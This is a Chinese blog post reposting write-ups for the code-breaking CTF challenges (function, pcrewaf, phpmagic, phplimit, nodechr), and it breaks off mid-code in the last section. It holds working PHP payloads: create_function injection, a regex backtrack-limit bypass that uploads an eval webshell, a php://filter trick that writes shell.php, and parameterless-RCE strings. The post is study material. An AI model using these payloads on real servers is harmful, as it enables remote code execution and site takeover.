<!DOCTYPE html>






<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.1">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.1" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.1">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.1',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="路漫漫其修远兮">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="code-breaking">
<meta property="og:url" content="http://yoursite.com/2019/10/22/code-breaking全部题解及知识拓展/index.html">
<meta property="og:site_name" content="su33er的博客">
<meta property="og:description" content="路漫漫其修远兮">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/myctf/jactf_web/jactf_webnoteasy_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pcre.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_1.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_2.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_1.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_2.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_3.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/javacon_4.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_1.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_2.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_4.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_5.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_6.png">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_7.png">
<meta property="og:updated_time" content="2020-04-13T14:05:28.674Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="code-breaking">
<meta name="twitter:description" content="路漫漫其修远兮">
<meta name="twitter:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/myctf/jactf_web/jactf_webnoteasy_1.png">
  <link rel="canonical" href="http://yoursite.com/2019/10/22/code-breaking全部题解及知识拓展/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>code-breaking | su33er的博客</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">su33er的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
        
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-about">
      
    

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-tags">
      
    

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-偶尔看看女神">
      
    

    <a href="/qiangfu/" rel="section"><i class="fa fa-fw fa-calendar"></i>偶尔看看女神</a>

  </li>
      
    
  </ul>

    

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/22/code-breaking全部题解及知识拓展/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="su33er">
      <meta itemprop="description" content="心之所向皆是遗憾，目之所及皆是过往">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="su33er的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            code-breaking
            

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2019-10-22 19:22:53" itemprop="dateCreated datePublished" datetime="2019-10-22T19:22:53+08:00">2019-10-22</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-04-13 22:05:28" itemprop="dateModified" datetime="2020-04-13T22:05:28+08:00">2020-04-13</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>路漫漫其修远兮</p>
<a id="more"></a>
<p>code-breaking全部题解及知识拓展</p>
<p><a href="https://xz.aliyun.com/t/6333#toc-2" target="_blank" rel="noopener">转载于</a><a href="https://xz.aliyun.com/t/6333#toc-2" target="_blank" rel="noopener">https://xz.aliyun.com/t/6333#toc-2</a> （先知社区）【仅供学习记录】</p>
<p>CodeBreaking : <a href="https://code-breaking.com/" target="_blank" rel="noopener">https://code-breaking.com/</a></p>
<p>在线正则表达式匹配 : <a href="https://regex101.com/" target="_blank" rel="noopener">https://regex101.com/</a></p>
<p>根据已有的大佬们的 wp 对 code breaking 做的一个复现，很多内容都是第一次接触，对涉及到的知识点做些总结和拓展。</p>
<h1 id="function"><a href="#function" class="headerlink" title="function"></a>function</h1><ul>
<li><p>create_function 注入</p>
</li>
<li><p>源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$action = $_GET[&apos;action&apos;] ?? &apos;&apos;;</span><br><span class="line">$arg = $_GET[&apos;arg&apos;] ?? &apos;&apos;;</span><br><span class="line">if(preg_match(&apos;/^[a-z0-9_]*$/isD&apos;, $action)) &#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    $action(&apos;&apos;, $arg);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>正则 <code>/i</code> 不区分大小写，<code>/s</code> 匹配任何不可见字符，包括空格，TAB，换行，<code>/D</code> 如果使用 <code>$</code> 限制结尾字符，则不允许结尾有换行</p>
</li>
<li><p><code>preg_match(&#39;/^[a-z0-9_]*$/isD&#39;, $action)</code> 匹配所有字母，数字和下划线开头的字符串</p>
</li>
<li><p>想通过 fuzz 找到字符串以达到 bypass 的目的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url_start = &apos;http://192.168.233.132:8087/?action=&apos;</span><br><span class="line">url_end = &apos;var_dump&amp;arg=2&apos;</span><br><span class="line"></span><br><span class="line">for i in range(1,256):</span><br><span class="line">  i = chr(i).encode()</span><br><span class="line">  para = i.hex()</span><br><span class="line"></span><br><span class="line">  url = url_start + &apos;%&apos; + str(para) + url_end</span><br><span class="line">  r = requests.get(url=url)</span><br><span class="line"></span><br><span class="line">    # 不出现 error 且 不返回 index.php</span><br><span class="line">  if (r.headers[&apos;Content-Length&apos;] != &apos;279&apos;) and (&apos;error&apos; not in r.text):</span><br><span class="line">      print(para)</span><br></pre></td></tr></table></figure>
</li>
<li><p>找到了 <code>%5c</code>，即 <code>\</code>，可以让 var_dump 成功执行，ph 牛给了如下的解释。接下来就是 getshell 函数的寻找，要有两个参数且第二个参数可能会导致 RCE</p>
<blockquote>
<p>php 里默认命名空间是 \，所有原生函数和类都在这个命名空间中。普通调用一个函数，如果直接写函数名 function_name() 调用，调用的时候其实相当于写了一个相对路径；而如果写 \function_name() 这样调用函数，则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类，就必须写绝对路径这种写法。</p>
</blockquote>
</li>
<li><p>不难发现函数 create_function，官方定义如图</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/myctf/jactf_web/jactf_webnoteasy_1.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/myctf/jactf_web/jactf_webnoteasy_1.png" alt="img"></a></p>
</li>
<li><p>以如下代码为例</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$newfunc = create_function(&apos;$a,$b&apos;, &apos;return &quot;ln($a) + ln($b) = &quot; . log($a * $b);&apos;);</span><br><span class="line">echo &quot;New anonymous function: $newfunc\n&quot;;</span><br><span class="line">echo $newfunc(2, M_E) . &quot;\n&quot;;</span><br><span class="line">// outputs</span><br><span class="line">// New anonymous function: lambda_1</span><br><span class="line">// ln(2) + ln(2.718281828459) = 1.6931471805599</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>第一行代码等价于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">eval(</span><br><span class="line">function __lambda_func($a, $b)&#123;</span><br><span class="line">  return &quot;ln($a) + ln($b) = &quot; . log($a * $b); </span><br><span class="line">&#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
</li>
<li><p>本题就可以构造 payload : <code>action=\create_function&amp;arg=return &#39;peri0d&#39;;}var_dump(scandir(&#39;../&#39;));/*</code>，然后 readfile(flag) 即可</p>
<p>相当于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">eval(</span><br><span class="line">function __lambda_func($a, $b)&#123;</span><br><span class="line">  return &apos;peri0d&apos;;&#125;</span><br><span class="line">  var_dump(scandir(&apos;../&apos;)); /*</span><br><span class="line">&#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="pcrewaf"><a href="#pcrewaf" class="headerlink" title="pcrewaf"></a>pcrewaf</h1><ul>
<li><p>PCRE 回溯次数限制绕过正则</p>
</li>
<li><p>源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function is_php($data)&#123;</span><br><span class="line">    return preg_match(&apos;/&lt;\?.*[(`;?&gt;].*/is&apos;, $data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(empty($_FILES)) &#123;</span><br><span class="line">    die(show_source(__FILE__));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$user_dir = &apos;data/&apos; . md5($_SERVER[&apos;REMOTE_ADDR&apos;]);</span><br><span class="line">$data = file_get_contents($_FILES[&apos;file&apos;][&apos;tmp_name&apos;]);</span><br><span class="line">if (is_php($data)) &#123;</span><br><span class="line">    echo &quot;bad request&quot;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    @mkdir($user_dir, 0755);</span><br><span class="line">    $path = $user_dir . &apos;/&apos; . random_int(0, 10) . &apos;.php&apos;;</span><br><span class="line">    move_uploaded_file($_FILES[&apos;file&apos;][&apos;tmp_name&apos;], $path);</span><br><span class="line"></span><br><span class="line">    header(&quot;Location: $path&quot;, true, 303);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>上传文件，使用正则判断是否含有 php 代码，正则 <code>/i</code> 不区分大小写，<code>/s</code> 匹配任何不可见字符，包括空格，TAB，换行。</p>
</li>
<li><p>如果不含有 php 代码，上传的文件会被保存，并在 http 中重定向到文件路径</p>
</li>
<li><p>常见的正则引擎有两种，DFA 和 NFA，php 中的 PCRE 库使用的是 NFA，</p>
<ul>
<li>DFA : 从起始状态开始，一个字符一个字符地读取输入串，并根据正则来一步步确定至下一个转移状态，直到匹配不上或走完整个输入</li>
<li>NFA : 从起始状态开始，一个字符一个字符地读取输入串，并与正则表达式进行匹配，如果匹配不上，则进行回溯，尝试其他状态</li>
</ul>
</li>
<li><p>假设待匹配字符串 ` 匹配顺序如下图 :</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pcre.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pcre.png" alt="img"></a></p>
</li>
<li><p>在第四步，由于匹配的是 <code>.*</code> 任意多个字符，所以匹配到最后</p>
</li>
<li><p>按照正则，在 <code>.*</code> 后面应该是 <code>[(</code>;?&gt;]<code>，显然</code>//aaaaa<code>不对，所以依次吐出这几个字符，即回溯，这里总共回溯了 8 次，回溯到</code>;<code>时</code>.<em><code>匹配的是</code> ，后面的 <code>;</code> 符合 <code>[(</code>;?&gt;]<code>，所以匹配</code>;<code>，然后正则最后的</code>.</em>` 匹配到最后</p>
</li>
<li><p>php 有一个回溯上限 <code>backtrack_limit</code> ，默认是 1000000。如果回溯上限超过 100 万那么 preg_match 返回 false ，既不是 1 也不是 0 ，这样就可以绕过了</p>
</li>
<li><p>对应 poc :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">from io import BytesIO</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.233.132:8088/index.php&apos;</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">  &apos;file&apos;: BytesIO(b&apos;&lt;?php eval($_POST[shell]);//&apos; + b&apos;a&apos;*1000000)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"># 请求并禁止重定向</span><br><span class="line">r = requests.post(url=url, files=files, allow_redirects=False)</span><br><span class="line"></span><br><span class="line">print(r.headers)</span><br></pre></td></tr></table></figure>
</li>
<li><p>可以获取 shell 位置，连接即可</p>
</li>
<li><p>如下一个 waf :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(preg_match(&apos;/UNION.+?SELECT/is&apos;, $input)) &#123;</span><br><span class="line">    die(&apos;SQL Injection&apos;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>输入 <code>UNION/*aaaaa*/SELECT</code> ，这个正则表达式执行流程如下</p>
<ol>
<li>正则先匹配 UNION，然后 <code>.+?</code> 匹配 /</li>
<li>由于是非贪婪匹配，匹配最短字符，所以只匹配到 / 就停止</li>
<li>接着 <code>S</code> 匹配 <em>，匹配失败，回溯，由 <code>.+?</code> 匹配</em> ，成功</li>
<li>重复上一步，直到匹配结束</li>
</ol>
</li>
<li><p>这里也可以利用回溯次数限制绕过正则</p>
</li>
<li><p><code>preg_match</code> 返回的是匹配到的次数，如果匹配不到会返回 0 ，如果报错就会返回 false 。所以，对 <code>preg_match</code> 来说，只要对返回结果有判断，就可以避免这样的问题</p>
</li>
</ul>
<h1 id="phpmagic"><a href="#phpmagic" class="headerlink" title="phpmagic"></a>phpmagic</h1><ul>
<li><p>伪协议解码 base64 写入 shell</p>
</li>
<li><p>代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&apos;read-source&apos;])) &#123;</span><br><span class="line">    exit(show_source(__FILE__));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">define(&apos;DATA_DIR&apos;, dirname(__FILE__) . &apos;/data/&apos; . md5($_SERVER[&apos;REMOTE_ADDR&apos;]));</span><br><span class="line"></span><br><span class="line">if(!is_dir(DATA_DIR)) &#123;</span><br><span class="line">    mkdir(DATA_DIR, 0755, true);</span><br><span class="line">&#125;</span><br><span class="line">chdir(DATA_DIR);</span><br><span class="line"></span><br><span class="line">$domain = isset($_POST[&apos;domain&apos;]) ? $_POST[&apos;domain&apos;] : &apos;&apos;;</span><br><span class="line">$log_name = isset($_POST[&apos;log&apos;]) ? $_POST[&apos;log&apos;] : date(&apos;-Y-m-d&apos;);</span><br><span class="line"></span><br><span class="line">if(!empty($_POST) &amp;&amp; $domain)&#123;</span><br><span class="line">    $command = sprintf(&quot;dig -t A -q %s&quot;, escapeshellarg($domain));</span><br><span class="line">    $output = shell_exec($command);</span><br><span class="line">    $output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);</span><br><span class="line"></span><br><span class="line">    $log_name = $_SERVER[&apos;SERVER_NAME&apos;] . $log_name;</span><br><span class="line">    if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), [&apos;php&apos;, &apos;php3&apos;, &apos;php4&apos;, &apos;php5&apos;, &apos;phtml&apos;, &apos;pht&apos;], true)) &#123;</span><br><span class="line">        file_put_contents($log_name, $output);</span><br><span class="line">        &#125;</span><br><span class="line">echo $output;</span><br><span class="line">&#125;</span><br><span class="line">endif; </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>$_SERVER[&#39;REMOTE_ADDR&#39;]</code> 获取浏览当前页面的用户的 IP 地址，在 data 下创建文件夹，用于存储 output</p>
</li>
<li><p>$domain 和 $log 两个参数可控，$domain 用于 dig 命令，$log 用于将结果写入</p>
</li>
<li><p>在 php 中，只要是传 filename 的地方，都可以传协议流</p>
</li>
<li><p>思路就是 $log_name 处利用伪协议将 $output 处的字符串 base64 解码写入 webshell</p>
</li>
<li><p><code>$_SERVER[&#39;SERVER_NAME&#39;]</code> 获取当前运行脚本所在的服务器的主机名。如果脚本运行于虚拟主机中，该名称是由那个虚拟主机所设置的值决定。这个值可以更改，由 HTTP Header 中的 Host 决定。</p>
</li>
<li><p><code>pathinfo()</code> 函数过滤后缀名，但是，只要在后缀名后加上 <code>/.</code> ，它就获取不到后缀名了，且可以正常写入 <code>.php</code> 之中。php 在处理路径的时候，会递归删除掉路径中存在的 <code>/.</code></p>
</li>
<li><p>php 伪协议 base64 解码中，如果遇到不合规范的字符就直接跳过。base64 解码是按照 4 位解的，所以要只有传入 4 的倍数位字符串才能解码为正常字符串，且传入的 base64 不能以 <code>==</code> 结尾，<code>==</code> 出现在 base64 中间不符合规则，可能会无法解析</p>
</li>
<li><p>payload :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST</span><br><span class="line">Host: php</span><br><span class="line"></span><br><span class="line">domain=YWFhYTw/cGhwIGV2YWwoJF9QT1NUWydzaGVsbCddKTsgLy8q&amp;log=://filter/write=convert.base64-decode/resource=/var/www/html/data/daa6b8b28b2eda419112a887399ce9fc/shell.php/.</span><br></pre></td></tr></table></figure>

<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_1.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_1.PNG" alt="img"></a></p>
</li>
<li><p>结果 :</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_2.PNG" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/phpmagic_2.PNG" alt="img"></a></p>
</li>
</ul>
<h1 id="phplimit"><a href="#phplimit" class="headerlink" title="phplimit"></a>phplimit</h1><ul>
<li><p>无参 RCE</p>
</li>
<li><p>代码如下 :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(&apos;;&apos; === preg_replace(&apos;/[^\W]+\((?R)?\)/&apos;, &apos;&apos;, $_GET[&apos;code&apos;])) &#123;    </span><br><span class="line">    eval($_GET[&apos;code&apos;]);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>ciscn 2019 和 rctf 2018 的题目，统计一下这一题的解法，主要是 get_defined_vars() 和 session_id() 两个函数</p>
</li>
<li><p><code>preg_replace(&#39;/[^\W]+\((?R)?\)/&#39;, &#39;&#39;, $_GET[&#39;code&#39;])</code>，<code>\W</code> 匹配任意字母和数字，<code>(?R)?</code> 重复整个模式，<code>?R</code> 是 php 中的一种<a href="https://php.net/manual/zh/regexp.reference.recursive.php" target="_blank" rel="noopener">递归模式</a>，合在一起类似于匹配 <code>x(y(z()))</code> 样式的，且不能存在参数，输入 <code>?code=phpinfo();</code> 可以查看 phpinfo 页面</p>
</li>
<li><p>在 rctf 2018 的题目中使用的是 apache 的容器，在本题使用 nginx 容器，都是考虑通过修改请求头信息来实现 RCE</p>
</li>
<li><p>在 apache 中可以使用 <code>getallheaders()</code> 获取所有头信息，而在 nginx 中可以使用 <code>get_defined_vars()</code> 函数获取所有已定义的变量列表，然后就可以通过位置函数来操控数组</p>
</li>
<li><p><code>session_id()</code> 可以获取 PHPSESSID，虽然 PHPSESSID 只允许字母数字和下划线出现，<code>hex2bin</code> 转换一下编码即可</p>
</li>
<li><p>几个 payload :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// 第一个</span><br><span class="line">?code=eval(hex2bin(session_id(session_start())));  // echo &apos;peri0d&apos;;</span><br><span class="line">Cookie: PHPSESSID=6563686f2027706572693064273b</span><br><span class="line"></span><br><span class="line">//第二个</span><br><span class="line">?code=eval(end(current(get_defined_vars())));&amp;a=var_dump(scandir(&apos;../&apos;));</span><br><span class="line"></span><br><span class="line">//第三个</span><br><span class="line">?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="nodechr"><a href="#nodechr" class="headerlink" title="nodechr"></a>nodechr</h1><ul>
<li><p>js 的题目，关于 javascript 的大小写特性，两个函数 toLowerCase() 和 toLowerCase()</p>
</li>
<li><p>代码如下 :</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span 